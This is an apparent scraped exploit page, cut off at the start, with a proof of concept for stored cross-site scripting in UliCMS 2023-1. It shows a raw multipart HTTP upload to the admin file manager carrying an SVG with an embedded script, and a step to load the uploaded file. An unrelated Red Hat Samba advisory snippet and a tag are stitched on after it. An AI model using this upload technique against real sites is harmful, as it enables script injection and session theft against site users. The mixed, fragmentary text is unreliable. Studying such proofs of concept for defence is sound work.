?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36sec-ch-ua-platform: "Linux"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/dist/admin/fm/dialog.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delvConnection: close------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="fldr"------WebKitFormBoundaryK3CvcSs8xZwzABClContent-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundaryK3CvcSs8xZwzABCl--3. Go to http://localhost/dist/content/SVG_XSS.svg

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

Red Hat Security Advisory 2023-2137-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Tag

#linux